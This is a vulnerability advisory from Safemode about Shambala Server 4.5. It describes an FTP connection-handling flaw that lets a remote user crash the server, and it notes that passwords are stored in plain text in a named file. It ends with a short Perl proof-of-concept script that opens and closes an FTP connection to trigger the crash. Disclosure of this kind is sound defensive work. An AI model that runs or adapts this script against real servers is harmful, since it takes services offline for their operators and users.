Subject: DoS in Shambala Server
4.5
Platforms: Microsoft Windows
9x, WIndows NT and Windows 2000
Risk Level High
Author: zillion
Vendor: Evolvable Corporation
Vendor status: Notified 4
weeks ago. The problem will be fixed in a next release
Subject:
=========
Shambala Server 4.5 denial of service attack.
Overview:
==========
Shambala is a low cost, multi-featured FTP and Web server
distributed by
Evolvable Corporation. It is used by numerous amateur
and small office/home
webmasters as an economical way to launch and manage a
website.
A problem with Shambala's mishandling of connections and
disconnections would
potentially enable a (simple) denial-of-service attack.
A second observation
is Shambala's storage of passwords in-the-clear on the
server: a major problem
on Windows 95 and 98 platforms.
Product details:
=================
Vendor's blurb: "Shambala is an easy to use communications
server
featuring the ability to serve and access web sites, ftp
sites, and
chat rooms. Using Shambala, you can quickly create a web
site and host
it from any PC. Shambala doesn't require NT and its installation
is
non-invasive."
Technical description:
======================
Shambala does not handle all connections correctly. It
is therefore
possible to remotely crash the ftp server using a custom
script which
automates the action of opening and closing a connection
to and from the
server. The server crashes upon disconnection and gives
the following error:
Run-time error `20127`
invalid ConnectionID
A second problem is that Shambala stores all passwords
in plain text on the server:
c:\program files\shambala\passwords.txt (in our case)
This is not such a big deal on an NT server as permissions
could be set to deny access to this
file. Because the server is also shipped for Windows 95
and Windows 98 it could be possible for
any user to gain access to the file.
Recommendations:
================
It is recommended to disable the daemon until a fixed
package is released.
Vendor links:
==========
http://www.evolvable.com/
http://www.evolvable.com/estore/product.asp?sku=1
Contact info:
=============
Shambala creator: [email protected]
Bug founder:[email protected]
http://www.safemode.org
Greets:
========
Shoutz to #hackerzlair Edgemaster, The_Wizz (pintje?),
Munge, Acos, Dirk, RFP, George and all the s-mode members (what's left
of it ;).
---cut-here---
#!/usr/bin/perl
#
# This tool (tool not exploit!) crashes shambale server 4.5
# This is a stripped version of Guido Bakkers exploit code (bedankt)
#
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
&usage if !defined($args{s});
$serv = $args{s};
$EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print "Done...\n";
exit; # remove this and the server will *NOT* crash
sub usage {die("\n$0 -s ipaddress\n\n");}
---cut-here---
***********************************************************************************
This advisory was created by zillion (at) safemode.org
with the aim of promoting
secure computing and to warn users of potential holes
in networks and systems.
Safemode is not responsible for any malicious, illegal
or otherwise antisocial action
taken with the information revealed in this advisory.
Permission is granted for
copying and circulating this advisory to the Internet
community for the purpose
of alerting them to problems, if and only if, the advisory
is not edited or changed
in any way, and is attributed to Safemode. (with other
words: don't blame me ;)
***********************************************************************************
|
